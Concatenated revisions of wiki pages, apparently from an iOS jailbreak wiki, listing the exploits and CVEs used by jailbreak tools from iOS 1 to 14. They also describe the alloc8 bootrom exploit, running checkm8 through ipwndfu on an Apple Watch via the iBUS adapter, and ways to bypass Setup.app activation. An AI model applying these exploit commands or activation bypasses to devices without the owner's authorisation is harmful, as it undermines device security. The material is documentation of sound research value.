
* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.2~b)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

Alloc8 Exploit

2020-10-21T23:03:09Z

Inflatable Man: Added alloc8 CVE ID

{{lowercase}}
The '''alloc8 exploit''' is a [[bootrom]] exploit with a CVE ID of CVE-2019-9536 used to run unsigned code on both the [[Bootrom 359.3.2|new bootrom]] and the [[Bootrom 359.3|old bootrom]] [[N88AP|iPhone 3GS]] (and thereby [[jailbreak]] it). It is the first public [[Untethered jailbreak|untethered]] [[bootrom]] exploit for the [[Bootrom 359.3.2|new bootrom]] iPhone 3GS.

[[User:axi0mX|axi0mX]] published a detailed analysis of alloc8 at [https://github.com/axi0mX/alloc8/blob/master/README GitHub] following his discovery of the exploit.

[[ipwndfu]] is currently the primary and most simple way of using the alloc8 exploit.

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

Jailbreak Exploits

2020-09-24T00:34:54Z

Inflatable Man: Added iOS 14 edit

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.2~b)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

IBUS

2020-09-07T23:28:16Z

Inflatable Man: Fixed capitalization of proper noun ("Apple")

The "iBUS" adapter is a smaller "dongle" that takes advantage of the diagnostics port hidden behind a small plate in the slot where the band for your watch would normally slide into.

These adapters are sold by "MFC" and appear to be clones of Apple's own proprietary hardware; When plugged into a Mac via lightning-to-USB, the Apple Watch appears in Finder in the same way that other apple devices do when plugged in. It is also recognized by [[libimobiledevice]], Xcode, and Apple's Console.app, although no logs are displayed in the latter.

Not much information about these adapters has been released, by MFC or otherwise.

Adapters for the S4 and S5 have been announced as "upcoming"

== Usage for Research ==
While the adapters are marketed for their ability to "restore" devices, the signed firmware required to do so is not readily available. However, the adapter does allow exploitation of the S1, S2, and S3 Watches using [[checkm8]]

=== "Pwning" the watch and dumping the bootrom ===

==== Entering DFU ====
Once you've connected your Apple watch via a standard USB Lightning cable and the iBUS adapter:

# Hold the crown and power button down
# Immediately after the screen goes black, count to 3
# After 3 seconds, release the power button, but continue to hold the crown.

Finder should now show an "Apple Watch" in DFU mode, and will allow you to install signed firmware if you have any.

==== Exploiting with ipwndfu ====
Reliability of checkm8 on the watch can vary.

After cloning [https://github.com/axi0mX/ipwndfu], `cd` into the directory and run `./ipwndfu -p`

If the exploit fails, you may need to run it again. It can take anywhere from one to several hundred attempts.

From here, you can run `./ipwndfu --dump-rom` to dump the [[SecureRom]]. More information is available in the ipwndfu readme and on [[ipwndfu]].

Do note the `--boot` flag currently only works for the iPhone X.

You can use `./ipwndfu --hex-dump=0x0,0x10000000000` to crash out of DFU and force a reboot.

== Tips for usage ==
* As the metal rod that ships with the adapter often fits loosely, consider using rubber bands to firmly press the adapter into the port.
** A hairband is exceptional at this, and perfectly fits into the top of the watch.

{{DISPLAYTITLE:iBUS}}

/Applications/Setup.app

2020-09-07T18:58:20Z

Inflatable Man: Fixed minor grammar issue

[[Image:Setup.app.png|thumb|360px|Setup.app running on an iPhone 5]]
This application uses Framework 7 style and starts automatically after a restore or if [[lockdownd]] detects the device to be Unactivated (e.g. by deleting content of activation_records within Lockdown folder, you can trigger this effect).

The file comes as a standard Apple Pre-installed .app file and it draws it's form as a pop up window.
While this app is running, the [[/System/Library/CoreServices/SpringBoard.app]] app is frozen. Apple implemented this to prevent crashes by flooding Setup.app with Emoji keys or by overloading it's browser components with Javascript loops.

While the application's name is Setup.App, its internal bundle identifier is com.apple.purplebuddy.

As Setup.app is running it's window over [[/System/Library/CoreServices/SpringBoard.app]], crashing this app will leave the [[/System/Library/CoreServices/SpringBoard.app]] opened and let the phone be usable as a normal one even if it is not activated (but it has no service)(see Baseband Brickstate).

Crashing this app unlocks [[/System/Library/CoreServices/SpringBoard.app]] processes as the crash will entirely close the Setup.

This app is started automatically by lockdownd file, and it's configuration files consists in [[Com.apple.purplebuddy.plist]] file that contains Setup.app progress.
When setup is finished, this configuration file prevents Setup.app from showing up using these tags:

<code>
<key>SetupDone</key> 
<true/> 
<key>SetupFinishedAllSteps</key> 
<true/>
</code>

Setting it to false might not trigger the Setup.app as lockdownd finds the activation ticket inside lockdown folder.

==Crashing the Setup.app==
Ever since Apple introduced it, it was a kind of problem as this app prevents you from activating the device if you buy it from a foreign country and you don't have the foreign SIM CARD, therefore, a bunch of methods to overcome this app were created during its life.

* The Emoji Keys: Originally posted on YouTube, consists in flooding DNS / WiFi name fields with literally thousands of emojis. The Setup.app will crash rebooting the phone or going to [[/System/Library/CoreServices/SpringBoard.app]]. Apple has patched that method in iOS 9.2
* Button stressing: Consists in stressing out the Next> and <Back buttons in the same time until the app crashes. This behavior has been fixed in iOS 9.0
* Removing the app entirely: On A4 devices, due to their compatibility to limera1n (therefore the compatibility with @msftguy's SSH RD TOOL), you can SSH in DFU Mode to have access to the File System. Removing the app from /mnt1/Applications folder will redirect to [[/System/Library/CoreServices/SpringBoard.app]].
* Creating Custom-made firmware (CFW) with patched Setup.app: If you patch the application or anyway invalidate it, AMFI will not open it anymore thus redirecting to the Home Screen ([[/System/Library/CoreServices/SpringBoard.app]]). There are multiple ways you can patch the Mach-O app. This method still works.

== Parents ==
{{parent|Applications}}

[[Category:Software]]
[[Category:Filesystem]]
[[Category:Application]]

Jailbreak Exploits

2020-07-26T01:14:52Z

Inflatable Man: /* Unc0ver (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8) */

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
